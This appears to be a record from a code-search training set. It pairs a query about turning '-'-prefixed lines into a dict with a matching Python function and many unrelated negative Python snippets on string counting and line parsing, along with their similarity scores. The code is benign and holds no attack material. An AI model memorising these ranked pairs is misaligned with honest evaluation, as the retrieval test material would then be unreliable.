+ alg\n self.url += self.comms_unparsed[count]\n count += 1\n self.url += \"// {} \\n\".format(move[\"comment\"])\n else:\n if \"move\" in move:\n if move[\"move\"] != \"\":\n self.url += \"{} \".format(move[\"move\"])\n if move[\"comment\"] != \"\":\n if \"mistake\" in move[\"comment\"]:\n move[\"comment\"] = \"{}\\n//{}\".format(move[\"comment\"].split(\"mistake\")[0], \"mistake from here\")\n if \"#\" in move[\"comment\"]:\n piece = move[\"comment\"].split(\"#\")[0]\n move[\"comment\"] = move[\"comment\"].split(\"#\")[1]\n if self.url.rfind(\"\\n\") != -1:\n alg = self.url[self.url.rfind(\"\\n\") + 1:]\n self.url = self.url[:self.url.rfind(\"\\n\") + 1] + \"//{}\\n\".format(piece) + alg\n\n self.url += \"// {} \\n\".format(move[\"comment\"])\n else:\n self.url += \"// {} \\n\".format(move[\"comment\"])", "def __str__(self):\r\n # this will hold the output lines while we are generating them\r\n output_lines = []\r\n\r\n # Build an ordered list of headers\r\n # 2. The optional columns in the mapping file\r\n headers_present = self._metadata.iteritems().next()[1].keys()\r\n optional_headers = list(set(headers_present) -\r\n set(self.req_header_prefix +\r\n self.req_header_suffix))\r\n\r\n headers = (self.req_header_prefix + optional_headers +\r\n self.req_header_suffix)\r\n\r\n output_lines.extend(self.Comments)\r\n output_lines.append('#' + '\\t'.join(headers))\r\n\r\n for sample_id, data in self._metadata.iteritems():\r\n current_data = []\r\n\r\n # Get the first required columns\r\n current_data.append(sample_id)\r\n # skip the SampleID required header, since we get that from the\r\n # dict we are currently iterating over\r\n for header in self.req_header_prefix[1:]:\r\n current_data.append(data[header])\r\n\r\n # Get the optional columns; allow for None in these columns\r\n for header in optional_headers:\r\n value = self.no_data_value if data[header] is None else \\\r\n data[header]\r\n\r\n current_data.append(value)\r\n\r\n # get the last required columns\r\n for header in self.req_header_suffix:\r\n current_data.append(data[header])\r\n\r\n output_lines.append('\\t'.join([str(x) for x in current_data]))\r\n\r\n return '\\n'.join(output_lines) + '\\n'", "def write_results(chunks, accession_db, tax_db, taxonomy_file):\n try:\n with open(taxonomy_file, \"wt\") as output:\n #output.write(\"gi\\ttaxid\\t{0}\\n\".format(\";\".join(ranks)))\n output.write(\"accession\\ttaxid\\tAnnotation\\n\")\n for accession in chunks:\n taxids = accession_db.taxid(accession)\n for tax in taxids:\n lineage = tax_db.lineage_name(tax[1], reverse=True)\n if lineage:\n output.write(\"{0[0]}\\t{0[1]}\\t{1}\\n\".format(\n tax, \";\".join(lineage)))\n except IOError:\n sys.exit(\"Error cannot open {0}\".format(taxonomy_file))" ]
[ "0.60390484", "0.599767", "0.5916299", "0.5812747", "0.56795824", "0.5623025", "0.54872257", "0.5453515", "0.5433996", "0.53970265", "0.53352237", "0.5327005", "0.5286181", "0.5284214", "0.5239452", "0.522815", "0.5226091", "0.5211899", "0.52046853", "0.51947665", "0.5192673", "0.5184921", "0.51769", "0.5173248", "0.5169315", "0.51682836", "0.51660895", "0.5158815", "0.5147907", "0.51409143", "0.51317394", "0.51250976", "0.5121139", "0.51140594", "0.5110773", "0.5108708", "0.5096325", "0.5096041", "0.5093406", "0.50932103", "0.50901115", "0.50898755", "0.508971", "0.50888723", "0.5080861", "0.50806975", "0.5079697", "0.50768155", "0.5074366", "0.50647086", "0.5063497", "0.5060274", "0.5058169", "0.50555205", "0.5047074", "0.50458807", "0.504586", "0.504466", "0.5044409", "0.5037497", "0.5036867", "0.5033993", "0.5022252", "0.50190175", "0.5017851", "0.50090605", "0.50053227", "0.50003123", "0.49988276", "0.49949187", "0.4991584", "0.4989504", "0.49822435", "0.4976393", "0.4968116", "0.49633968", "0.496124", "0.49560708", "0.49367806", "0.49339706", "0.493086", "0.49247238", "0.49229756", "0.49217606", "0.49214646", "0.49204448", "0.4918466", "0.49149147", "0.4906527", "0.4900174", "0.4899131", "0.48941708", "0.48903373", "0.48893827", "0.4888658", "0.48844495", "0.4882481", "0.48715347", "0.48670706", "0.48660883" ]
0.5896646
3
Helper function for counting leading "-"s
def leading(self, string: str) -> int:
    leading_amount = 0
    while string[leading_amount] == "-":
        leading_amount += 1
    return leading_amount
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def find_blank(bd):\n count = 0\n for num in bd:\n if num == \" \":\n return count\n else:\n count += 1", "def linecount(x):\n return sum(1 for char in x if char == \"\\n\")", "def test_number_start_word():\n assert syllapy.count(\"4dog\") == 0", "def srow(string, i):\r\n return string.count('\\n', 0, max(0, i)) + 1", "def _getNumberOfSpaces(self, str):\n\t\tnum = 0\n\t\tfor char in str:\n\t\t\tif char is \" \":\n\t\t\t\tnum += 1\n\t\treturn num", "def count_abbas(str):\r\n i = 0\r\n count = 0\r\n for i in range(0, len(str)):\r\n if str.startswith(\"abba\", i):\r\n count += 1\r\n return count", "def heading_count(self, phrase,char='~'):\r\n count = 0\r\n for x in phrase:\r\n if x != char:\r\n break\r\n count+=1\r\n return count,phrase[count:]", "def start_with_the_beggining(rna: str):\n return 0", "def count_common_prefix(str_seq, prefix):\r\n\r\n count = 0\r\n for element in str_seq:\r\n if element.startswith(prefix):\r\n count += 1\r\n return count", "def test_single_letter_count(self):\n self.assertEqual(functions.single_letter_count(\"Hello World\", \"h\"), 1)\n self.assertEqual(functions.single_letter_count(\"Hello World\", \"z\"), 0)\n self.assertEqual(functions.single_letter_count(\"HelLo World\", \"l\"), 3)", "def count_dashes(txt):\n count = 0\n for c in txt:\n if c == '-':\n count += 1\n return count", "def test_number_in_word():\n assert syllapy.count(\"d0g\") == 0", "def len(string):\n l = 0\n skip = False\n for c in string:\n if skip:\n if c == 'm':\n skip = False\n else:\n if c == '\\x1b':\n skip = True\n else:\n l += 1\n return l", "def nextString(self, s, start):\r\n parens = 0\r\n quotes = 0\r\n\r\n for pos in range(start,len(s)):\r\n c = s[pos]\r\n if c == \",\" and parens == 0 and quotes == 0:\r\n return pos+1\r\n elif c == \"(\" and quotes == 0:\r\n parens += 1\r\n elif c == \")\" and quotes == 0:\r\n parens -= 1\r\n elif c == \"\\'\" and quotes == 0:\r\n quotes = 1\r\n elif c ==\"\\'\" and quotes == 1:\r\n quotes = 0\r\n \r\n return len(s)+1", "def header_len(fname,header_char='#'):\n Nheader = 0\n with open(fname) as f:\n for i, l in enumerate(f):\n if ( (l[0:len(header_char)]==header_char) or (l==\"\\n\") ):\n Nheader += 1\n else:\n break\n\n return Nheader", "def COUNTBLANK(count_list):\n if type(count_list) == list:\n cnt = 0\n for i in range(len(count_list)):\n if count_list[i] == '':\n cnt += 1\n return(cnt)\n else:\n print('Invalid type: count_list must be a list.')", "def sticky_count_wrapper(fwd_str):\n length = len(fwd_str)\n count = 0\n rev_index = length-1\n for index in range(length/2):\n # print fwd_str[index], \" \", fwd_str[rev_index - index]\n if get_opposite_character(fwd_str, index) is not fwd_str[rev_index-index]:\n # print \"Breaking the Code :\",get_opposite_character(fwd_str, index), \" is not equal to \",\n # fwd_str[rev_index - index]\n break\n count += 1\n return count", "def __count_text(text, limit=None):\n\n count = 0\n is_text = True\n for i, c in enumerate(text):\n if is_text and c == '\\33':\n is_text = False\n\n if is_text:\n count += 1\n if limit is not None and count == limit:\n return i + 1\n\n if not is_text and c == 'm':\n is_text = True\n\n if limit is not None:\n return len(text)\n else:\n return count", "def count_indents(text):\n t = re.match(r'^( *)', text)\n return len(t.group(0))", "def test_number_end_word():\n assert syllapy.count(\"dog123\") == 0", "def count(text):\n return len(text)", "def calculate_line_number(text):\n return len([line for line in text.split(\"\\n\") if line.strip() != \"\"])", "def length(s: str) 
-> int:\n count = 0\n for i in s:\n count += 1\n return count", "def num_length(full):\n length = 0\n while length < len(full) and (is_int(full[length]) or full[length] == \".\"):\n length += 1\n return length", "def test_aabcdd():\n assert part_01.count_for('abbcdd', 2) == 1\n assert part_01.count_for('aabcdd', 3) == 0", "def num_trailing_zeros(val):\n val = str(val)\n counter = 0\n\n for char in reversed(val):\n if char == \".\" or char != \"0\" : break\n elif char == \"0\" : counter += 1\n\n return counter", "def _getNewCodeLength(self):\n nb_lines = 0\n for line in self.body.splitlines():\n if not line.startswith(\"-\"):\n nb_lines += 1\n return nb_lines", "def get_indent(self, s):\n return len(s) - len(s.lstrip())", "def kncount(self, string, prefixes=None): ###\n if prefixes == None:\n prefixes = list(self.dist(\"\").keys())\n return sum([self.count(p + string) >= 1 for p in prefixes])", "def count_exclamations(txt):\n count = 0\n for c in txt:\n if c == '!':\n count += 1\n return count", "def sentence_count(self):\n count = 0\n for line in self.lines:\n if '.' in line:\n count += 1\n if count == 0:\n count = 1\n return count\n #return line.count('.')\n #else:\n #return 1", "def linecounter(x):\n return linecount(x) + longlines(x)", "def count_valid(message, prefix):\n return 3", "def get_num_bucket_names(file_name, start_after_value, start_after_line_num, prefix_postfix_option, acronyms_only_option):\n num_bucket_names = 0\n found_start = True\n if start_after_line_num or start_after_value:\n found_start = False\n\n f = open(file_name, \"r\")\n for index, line in enumerate(f):\n line = line.strip()\n if not found_start:\n if start_after_line_num == (index + 1) or start_after_value == line:\n found_start = True\n continue\n else:\n num_bucket_names += len(get_string_variations(line.strip(), prefix_postfix_option, acronyms_only_option))\n return num_bucket_names", "def gather_counts(directory):\n counts_un = defaultdict(int)\n counts_bi = defaultdict(int)\n counts_tri = defaultdict(int)\n prev_prev = \"<s>\"\n prev = \"<s>\"\n for filename in os.listdir(f\"./{directory}\"):\n if \".DS_Store\" in filename:\n continue\n with open(f\"./{directory}/{filename}\", \"r\") as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n counts_un[line+\"\\n\"] += 1\n counts_bi[prev+\"\\n\"+line+\"\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\"+line+\"\\n\"] += 1\n prev_prev = prev\n prev = line\n counts_un[\"</s>\\n\"] += 2\n counts_bi[\"</s>\\n</s>\\n\"] += 1\n counts_bi[prev+\"\\n\"+\"</s>\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\" + \"</s>\\n\"] += 1\n counts_tri[prev+\"\\n</s>\\n</s>\\n\"] += 1\n return counts_un, counts_bi, counts_tri", "def count_hi(str):\n return str.count(\"hi\")", "def test_character_count(self):\n\t\tself.assertEqual(analyse_text(self.filename)[1], 133)", "def count_indents(text):\n counts = 0\n for char in text:\n if char.isspace() and char != \"\\t\" and char !=\"\\n\":\n counts += 1\n elif char.isalpha():\n break\n return counts", "def test_line_count(self):\n\t\tself.assertEqual(analyse_text(self.filename)[0], 4)", "def test_ababab():\n assert part_01.count_for('ababab', 2) == 0\n assert part_01.count_for('ababab', 3) == 1", "def _getOldCodeLength(self):\n nb_lines = 0\n for line in self.body.splitlines():\n if not line.startswith(\"+\"):\n nb_lines += 1\n return nb_lines", "def part1(fname: str) -> int:\n return sum(len(set(''.join(group))) for group in get_data(fname))", "def get_code_length(code):\n ignore = [\"{\", \"}\", 
\"(\", \")\", \";\", \":\"]\n for ig in ignore:\n code = code.replace(ig, \"\")\n return len([e.strip() for e in code.split(\"\\n\") if (not e.strip() == \"\") and (not e.strip() == u\"'\") and (not e.strip() == u\"u'\")])", "def next_section_start_pos(text, start):\n section_re = re.compile(\"^.*\\n-+$\", re.I|re.MULTILINE) \n next_section = section_re.search(text, start)\n return len(text) if next_section is None else next_section.start()", "def count_periods(txt):\n count = 0\n for c in txt:\n if c == '.':\n count += 1\n return count", "def sections(self) -> int:\n return len(self.string.split(\".\"))", "def count(self):\n string_count = 0\n string = ['abc', 'xyz', 'aba', '1221']\n for elements in string:\n length = len(elements) \n if length >= 2:\n if elements[0] == elements[-1]: \n string_count +=1\n print(\"String count :\", string_count)", "def true_length(self,str):\n\t\treturn len(re.sub(r'#\\[.*?\\]','',str))", "def getAlphaNumCharCount(sdata):\n\tacount = 0\n\tncount = 0\n\tscount = 0\n\tocount = 0\n\tassertEqual(type(sdata), str, \"input must be string\")\n\tfor c in sdata:\n\t\tif c.isnumeric():\n\t\t\tncount += 1\n\t\telif c.isalpha():\n\t\t\tacount += 1\n\t\telif c.isspace():\n\t\t\tscount += 1\n\t\telse:\n\t\t\tocount += 1\n\tr = (acount, ncount, ocount)\n\treturn r", "def find_sentence_length(s):\n count = 1\n for c in s:\n if c == ' ':\n count += 1\n elif c == '.' or c == '?' or c == '!':\n return count\n return count", "def nwords(s: str):\n letters = \"ABCDEFGHIJKLMNOPQRSTUVWXYZÄÜÖabcdefghijklmnopqrstuvwxyzüäö\"\n take = 0\n skip = 0\n for i in s:\n if i not in letters:\n skip += 1\n #print(\"S:\", skip)\n else:\n take += 1\n #print(\"t:\", take)\n res = (len(s) - take) + 1\n return res", "def __count_commas__(test_str: str) -> int:\n i = test_str.find(\",\")\n if i == -1:\n return 0\n return 1 + MachineInterface.__count_commas__(test_str[i+1:])", "def count_num_ones_in_a_row(bit_string) -> int:\n\n longest_ones_row: int = 0\n\n current_ones_row: int = 0\n\n for b in bit_string:\n if b == \"1\":\n current_ones_row += 1\n else:\n current_ones_row = 0\n\n if current_ones_row > longest_ones_row:\n longest_ones_row = current_ones_row\n\n return longest_ones_row", "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 11)", "def common_prefix_length(s, u):\n length = 0\n for cs, cu in zip(s, u):\n if cs != cu:\n break\n length += 1\n return length", "def test_count_gaps(self):\n self.assertEqual(self.RNA(\"\").count_gaps(), 0)\n self.assertEqual(self.RNA(\"ACUGUCAGUACGHSDKCUCDNNS\").count_gaps(), 0)\n self.assertEqual(self.RNA(\"GUACGUACAKDC-SDHDSK\").count_gaps(), 1)\n self.assertEqual(self.RNA(\"-DSHUHDS\").count_gaps(), 1)\n self.assertEqual(self.RNA(\"UACHASADS-\").count_gaps(), 1)\n self.assertEqual(self.RNA(\"---CGAUgCAU---ACGHc---ACGUCAGU---\").count_gaps(), 12)", "def header_len(self):\n if self.num_lines_header is None:\n Nheader = 0\n with self._compression_safe_file_opener(self.input_fname, \"r\") as f:\n for i, l in enumerate(f):\n if (l[0 : len(self.header_char)] == self.header_char) or (\n l == \"\\n\"\n ):\n Nheader += 1\n else:\n break\n\n return Nheader\n else:\n return self.num_lines_header", "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 4)", "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 4)", "def length(cont):\r\n\r\n mySum = 0\r\n\r\n if cont == \"\":\r\n return 0\r\n else:\r\n mySum += 1 + length(cont[1:])\r\n return mySum", "def scan_full_pr(fastafile):\n 
n_full=0\n n=0\n\n with open(fastafile, \"r\") as f:\n lines=f.readlines()\n name=\"\"\n for line_n in lines:\n line=line_n.strip()\n if line[0]==\">\":\n name=line.replace(\">\",\"\")\n n+=1\n else:\n if line[0]==\"M\" and line[-1]==\"*\":\n n_full+=1\n sys.stdout.write(str(name)+\"\\n\")\n\n return n, n_full", "def count(seats: List[str]) -> int:\n # Map dimensions\n m = len(seats)\n n = len(seats[0]) if m else 0\n \n count = 0\n \n # Count locations filled with \"#\"\n for i in range(m):\n for j in range(n):\n if seats[i][j] == \"#\":\n count += 1\n\n return count", "def test_abbcde():\n assert part_01.count_for('abbcde', 2) == 1\n assert part_01.count_for('abbcde', 3) == 0", "def count_segments(s):\n s = s.strip().split()\n return len(s)", "def rp_get_leading_ws(c: Cmdr, lines: Any, tabWidth: Any) -> tuple[list[int], list[str]]:\n # c = self\n indents = [0, 0]\n leading_ws = [\"\", \"\"]\n for i in (0, 1):\n if i < len(lines):\n # Use the original, non-optimized leading whitespace.\n leading_ws[i] = ws = g.get_leading_ws(lines[i])\n indents[i] = g.computeWidth(ws, tabWidth)\n indents[1] = max(indents)\n if len(lines) == 1:\n leading_ws[1] = leading_ws[0]\n return indents, leading_ws", "def test_character_count(self):\n self.assertEqual(analyze_text(self.filename)[1], 132)", "def test_abcccd():\n assert part_01.count_for('abcccd', 2) == 0\n assert part_01.count_for('abcccd', 3) == 1", "def word_count(self):\n print(self.words())\n return len(self.words())\n #count = 0\n #for lines in self.lines:\n # line = lines.strip(os.linesep)\n # wordslst = line.split()\n # count += len(wordslst)\n #return count\n #joined_string = ''.join(self.lines)\n #for word in joined_string:\n # if word != ' ' and word != '\\n' and word != '\\t':\n # count += 1\n #print('READ ME ––––––––––', self.lines)\n #print(joined_string)\n #print(line)\n #print(wordslst)\n #print(count)", "def custom_count(string1, search_string):\n count = 0\n for index in range(0, len(string1)):\n phrase = string1[index:index + len(search_string)]\n count += (phrase == search_string)\n return count", "def skipWhite(self):\n logging.debug('Skipping whitespace')\n while (self.__current_pos < len(self.__string) and self.__string[self.__current_pos].isspace()):\n if self.__string[self.__current_pos] == '\\n': # TODO handle \\r and \\r\\n correctly, get position in the line correctly\n self.line += 1\n self.linePos = 0\n if self.__string[self.__current_pos] == '\\r' and self.__current_pos + 1 < len(self.__string) and self.__string[self.__current_pos + 1] != '\\n':\n print (\"counted r\")\n self.line += 1\n self.linePos = 0\n self.__current_pos += 1\n self.linePos += 1", "def sticky_count(st):\n fwd_str = st.strip(\" \")\n return sticky_count_wrapper(fwd_str=fwd_str)", "def wc(filename):\n\n\n # holds number of characters, words and lines in the file\n lines = 0\n words = 0\n char = 0\n try: # if the file does not exist\n file = open(filename)\n for line in file: # goes through file\n lines += 1\n wordList = line.split()\n words += len(wordList)\n for el in wordList: # this way I only count characters without \" \"(spaces)\n char += len(el)\n file.close()\n except Exception as e:\n print(e)\n lines, words, char = 404, 404, 404\n\n # prints out only if there was a right file name\n print(f\"{lines} {words} {char} {filename}\")", "def compute_nbtab(line):\n nb = 0\n for l in line:\n if l == '\\t':\n nb = nb + 1\n else:\n break\n return nb", "def found_needed_docstr(self):\n self.needed += 1\n self.found += 1", "def gapRunCount(letters):\n 
uniqLetters = map(operator.itemgetter(0), groupby(letters))\n return uniqLetters.count(\"-\")", "def len_link(s):\n length = 0\n while s != empty:\n s, length = rest(s), length + 1\n return length", "def len_link(s):\n length = 0\n while s != empty:\n s, length = rest(s), length + 1\n return length", "def len_link(s):\n length = 0\n while s != empty:\n s, length = rest(s), length + 1\n return length", "def len_link(s):\n length = 0\n while s != empty:\n s, length = rest(s), length + 1\n return length", "def check_prefix(custom_str: str) -> bool:\r\n\r\n return len(custom_str) == 0", "def minpart1(data: str = open(DIR+\"input.txt\", \"r\").read()) -> int:\n lines: List[str] = data.split(\"\\n\")\n sets: List[Set[str]] = list(map(lambda a: set(), range(len(lines[0]) + 1)))\n for i in range(ord(\"a\"), ord(\"z\") + 1):\n for line in lines:\n sets[len(re.findall(f\"{chr(i)}\", line))].add(line)\n return len(sets[2]) * len(sets[3])", "def check(string):\n if string[4]==\" \" and string[9]==\" \" and string[14]==\" \":\n add = 0\n count = 0\n for i in string:\n if 48<=ord(i)<= 57 or ord(i)==32:\n if 48 <= ord(i)<=57:\n add+=int(i)\n count+=1\n print(add,count)\n #return bool(count == 16)", "def count(word):\n\n return len(word)", "def countissue(s): \r\n if s:#check if Nonetype.\r\n if s=='None':\r\n #if type(s)==str or type(s)==float:#Handle \r\n return 0\r\n else:\r\n return len(s)\r\n else:#if empty\r\n return 0", "def _remove_beginning_newlines(lines):\n first_non_blank_line = 0\n\n for line in lines:\n if line.strip():\n break\n\n first_non_blank_line += 1\n\n return lines[first_non_blank_line:]", "def count_less(count, a):\n if len(a[0]) < len(a[1]):\n return count + 1\n return count", "def get_indent(line):\n if is_blank(line):\n return 0\n\n stripped = line.lstrip(' ')\n if stripped.startswith('- '):\n stripped = stripped[2:].lstrip(' ')\n # This is a list item\n\n return len(line) - len(stripped)", "def count_word(doc):\n count = count = 0\n for w in document.split(\" \"):\n count = count + 1\n return count", "def _get_num_syllables(doc: Doc, min_syllables: int = 1):\n text = (word for word in doc if not word.is_punct and \"'\" not in word.text)\n syllables_per_word = tuple(syllapy.count(word.text) for word in text)\n return sum(c for c in syllables_per_word if c >= min_syllables)", "def repeatedString(s, n):\n\n count = 0\n s_count_a = s.count('a')\n\n count += math.floor(n / len(s)) * s_count_a\n for _ in range(n % len(s)):\n if s[_] == 'a':\n count += 1\n\n return count", "def test_match_start_check_at_beginning_of_string(self):\n first_letter = \"a\"\n s = \"abcdef\"\n self.assertEqual(__, re.search(first_letter, s).group())", "def line_count(fname):\n return int(call(['wc', '-l', fname]).strip().split()[0])", "def _remaining_str_len(self, s: str) -> int:\r\n total_remaining_chars = len(s) # includes color/repeater specifiers\r\n\r\n specifiers_used = ''.join(self._color_or_repeater_regexp.findall(s))\r\n # length of specifier strings used\r\n specifier_chars_len = len(specifiers_used)\r\n\r\n return total_remaining_chars - specifier_chars_len", "def part1(data: str = None) -> int:\n polymer: str = getpolymer(data)\n return len(react(polymer))", "def countCharacters(file_name, start, end):\r\n\r\n with open(file_name, \"r\") as file:\r\n counter_chars = 0\r\n\r\n for line in islice(file, start, end):\r\n counter_chars += len(line)\r\n\r\n return counter_chars", "def test_character_count(self):\n self.assertEqual(analyze_text(self.filename)[1], 970)", "def test_discard_first(self):\n 
test_length = random.randint(0,100)\n test_string = \"#\\t{0}\".format(\"\\t\".join(map(str, xrange(test_length))))\n expected = test_length\n computed = len(self.parser.parse_header(test_string, extract_mock))\n self.assertEquals(expected, computed)", "def len_link_recursive(s):\n if s == empty:\n return 0\n return 1 + len_link_recursive(rest(s))", "def test_before_space():\n \n \n assert(1 == before_space(\"1 2 3\"))\n assert(\"NO SPACE\" == before_space(\"1\"))\n assert(\"Error\" == before_space(None))", "def count_semi_colons(txt):\n \n count = 0\n for c in txt:\n if c == ';':\n count += 1\n return count" ]
[ "0.6599933", "0.62831575", "0.62317944", "0.6203771", "0.6051275", "0.6027196", "0.599927", "0.5920738", "0.5860832", "0.5799355", "0.57977337", "0.57650226", "0.57611704", "0.57336843", "0.5714815", "0.5706141", "0.56840324", "0.5660799", "0.5651189", "0.5635546", "0.562362", "0.5612918", "0.5611543", "0.55728394", "0.5554686", "0.5538484", "0.551748", "0.55116844", "0.550551", "0.5481684", "0.5467182", "0.5457952", "0.5453982", "0.5447541", "0.5443042", "0.54361975", "0.5419882", "0.5418461", "0.54027873", "0.5394906", "0.53861624", "0.5383084", "0.53704125", "0.53497404", "0.53464967", "0.53406775", "0.53343564", "0.53261614", "0.53118515", "0.52961475", "0.5288309", "0.52842265", "0.5282063", "0.52791595", "0.5274662", "0.5266758", "0.5256109", "0.5250987", "0.5250987", "0.5240101", "0.5233277", "0.5231969", "0.52311456", "0.5226617", "0.52191216", "0.5216864", "0.52151066", "0.5212979", "0.5212222", "0.52103317", "0.5207186", "0.5205395", "0.5203507", "0.5186418", "0.5175645", "0.5169054", "0.5169054", "0.5169054", "0.5169054", "0.51680166", "0.5165108", "0.51634294", "0.51607394", "0.51585835", "0.5157562", "0.5152983", "0.51453626", "0.5139905", "0.51388896", "0.5137367", "0.5135156", "0.5133846", "0.5129005", "0.5125214", "0.51225996", "0.5121434", "0.5110038", "0.51021594", "0.5100197", "0.5097363" ]
0.62299573
3
Structurize the list of lines into a dict by counting the leading "-"s as values. We also get rid of the "-"s and whitespaces afterwards!
def structure(data: list) -> dict:
    structure = {}
    for i in range(0, len(data)):
        leading_ = Interpreter.leading(Interpreter(), data[i])
        data_ele = data[i].replace("-", "").strip()
        if data_ele in structure:
            structure[data_ele + "%%%"] = leading_
        structure[data_ele] = leading_
    return structure
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def dictFromLines(lines,sep=None):\n reComment = re.compile('#.*')\n temp = [reComment.sub('',x).strip() for x in lines.split('\\n')]\n if sep == None or type(sep) == type(''):\n temp = dict([x.split(sep,1) for x in temp if x])\n else: #--Assume re object.\n temp = dict([sep.split(x,1) for x in temp if x])\n return temp", "def parse_lines_to_dict(lines):\n res = {k: v.strip() for k, v in (m.split(':', 1) for m in lines)}\n return res", "def parse_file(input_lst):\n word_dct = {}\n for line in input_lst:\n raw_output = line.split() # these are lists of strings\n for str_ in raw_output: # strings\n str_ = str_.lower()\n str_ = str_.replace(\"-\", \" \")\n str_ = str_.replace(\"?\", \"\")\n str_ = str_.replace(\"!\", \"\")\n str_ = str_.replace(\",\", \"\")\n str_ = str_.replace(\"\\'\", \"\")\n str_ = str_.replace('\\\"', \"\")\n str_ = str_.replace(\".\", \"\")\n if str_ not in word_dct:\n word_dct[str_] = 1\n else:\n word_dct[str_] += 1\n return word_dct", "def fields_to_dict(lines, delim='\\t', strip_f=strip):\r\n result = {}\r\n for line in lines:\r\n # skip empty lines\r\n if strip_f:\r\n fields = map(strip_f, line.split(delim))\r\n else:\r\n fields = line.split(delim)\r\n if not fields[0]: # empty string in first field implies problem\r\n continue\r\n result[fields[0]] = fields[1:]\r\n return result", "def _handle_dict(string):\n dict_lines = [line.split(Parser.FIELD_DELIM) for line in string.split(Parser.LINE_DELIM)\n if Parser.FIELD_DELIM in line]\n cur_dict = 0\n results = [{}]\n for line in dict_lines:\n if line[0] in results[cur_dict]:\n results.append({})\n cur_dict += 1\n results[cur_dict][line[0]] = line[1]\n return results", "def export_commentary_text_as_dictionary(commentary_parts_list):\n verse_string = str(commentary_parts_list[0])\n header_string = str(commentary_parts_list[1])\n \n verse = re.search(r\"\\[(\\d+)\\]\", verse_string).group(1)\n header = re.search(r'\\<u\\>\\s*\"(.+)\"\\s*\\<\\/u\\>', header_string).group(1)\n\n commentary_text = commentary_parts_list[2].replace(\": \", \"\")\n key = verse + \"__\" + header\n \n return key, commentary_text.strip()", "def clean_data(self, lines):\n\n data = []\n curr = None\n for line in lines:\n line = self.clean_line(line)\n\n temp = []\n quotes = 0\n for item in line.split():\n if quotes % 2 == 0:\n temp.append(item)\n else:\n temp[-1] += item\n quotes += item.count(\"\\\"\")\n line = temp\n\n if not line:\n continue\n if curr:\n if self.compare_keys(curr, line):\n curr = self.merge_lines(curr, line)\n else:\n data.append(self.add_line(curr))\n curr = line\n else:\n curr = line\n if curr:\n data.append(self.add_line(curr))\n return data", "def process(raw):\n entry = { }\n cooked = [ ]\n\n for line in raw:\n line = line.strip()\n if len(line) == 0 or line[0]==\"#\" :\n continue\n parts = line.split(';')\n if len(parts) == 3:\n entry[\"description\"] = parts[0].strip() #adding key and values to the dict\n entry[\"long\"] = parts[1].strip()\n entry[\"lat\"] = parts[2].strip()\n cooked.append(entry) #add this dict entry into the array\n entry = { }\n continue\n else:\n raise ValueError(\"Trouble wiht line: '{}'\\n\".format(line))\n \n return cooked #returning an array of dicts", "def get_dict(fname):\n out_set, tot_count = {}, 0\n with open(fname, 'r') as fid:\n word_arr = fid.read().split('\\n')\n for ele in word_arr:\n if len(ele) > 0:\n out_set[(ele.split()[0])] = tot_count\n tot_count += 1\n return out_set", "def _split_raw_file(raw_file: str) -> dict:\r\n input_file = raw_file.split(\"\\n\")\r\n\r\n line_count = 
0\r\n statements = {}\r\n while line_count < len(input_file):\r\n line = input_file[line_count]\r\n if len(line) == 0:\r\n line_count += 1\r\n continue\r\n else:\r\n key = line\r\n value = input_file[line_count + 1]\r\n statements.update({key: value})\r\n line_count += 2\r\n return statements", "def counterdict(self):\n vas = []\n file = self.read1()\n for line in file:\n line = line.strip()\n string = re.sub(\"[^0-9a-zA-Z]\", \" \", line).split(\" \")\n for s_i in string:\n if s_i != \"\":\n vas.append(s_i)\n for ele in enumerate(vas):\n print(ele)\n logging.debug(\"Starting with to\")", "def makeDict(self, s):\n out = {}\n entries = s.split(self.dataDelimiterEntry)\n for e in entries:\n if e == \"\":\n continue\n c = e.split(self.dataDelimiterKey)\n out[c[0]] = c[1]\n return out", "def split(self, line):\n parts = line.split()\n return {\n 'size': 0 if parts[9] == '-' else int(parts[9]), \n 'file_requested': parts[6]\n }", "def _parse(file_contents):\n\n if file_contents is None or file_contents == '':\n return {}\n\n result = {}\n\n for line in file_contents.splitlines():\n # Full line comment\n if line[:1] == '#':\n continue\n\n parts = line.split('=', 1)\n\n # Not a full key-value pair.\n if len(parts) < 2:\n continue\n\n result[parts[0].strip()] = parts[1].strip()\n\n return result", "def parse_entry(lines):\n entry = {}\n for line in lines:\n line = line.replace('\\n', '').replace('\\r', '')\n if ':: ' in line:\n (key, value) = line.split(':: ')\n value = base64.b64decode(value).decode('utf-8')\n elif ': ' in line:\n (key, value) = line.split(': ')\n else:\n continue\n if key not in entry:\n entry[key] = []\n entry[key].append(value)\n return entry", "def _raw_misc_to_dict(raw):\n ret = {}\n for elem in raw:\n key, _, val = elem.partition(',')\n key = key.lstrip(\"(\").strip()\n val = val[:-1].strip()\n ret[key] = val\n return ret", "def __analyze_config(self):\n result = {}\n with open(self.file) as f:\n data = f.readlines()\n temp_key = ''\n for line in data:\n if line[0] == '\t' or line[0] == ';':\n result[temp_key].append(line.strip())\n else:\n temp_key = line.strip()\n result[temp_key] = []\n return result", "def configDict(config):\n config_dict = {}\n line_number = 0\n if type(config) == str:\n config_object = config.splitlines()\n else:\n return \"ERROR: config not type str\"\n for index, line in enumerate(config_object):\n if not bool(re.match(\"^\\s|!\", line)):\n line_number = index\n config_dict[line] = []\n elif bool(re.match(\"^\\s\", line)):\n config_dict[config_object[line_number]].append(line.strip())\n return config_dict", "def make_histogram(s):\n hist = {}\n for x in s:\n if x is '\\n':\n pass\n else:\n hist[x] = hist.get(x, 0) + 1\n return hist", "def create_dicts(self, path):\n line_d = {}\n rel_d = {}\n\n with open(path) as f:\n for line in islice(f, 0, None, 4):\n lister = line.split('\"')\n line_number = int(lister[0].split('\\t')[0])\n line_d[line_number] = ''.join(str(s) for s in lister[1:])\n \n with open(path) as f:\n for i, line in enumerate(islice(f, 1, None, 4)):\n rel_d[i] = line.split('\\n')[0]\n \n return (line_d, rel_d)", "def ParseWorkload(contents):\n fp = io.StringIO(contents)\n result = {}\n for line in fp:\n if (\n line.strip()\n and not 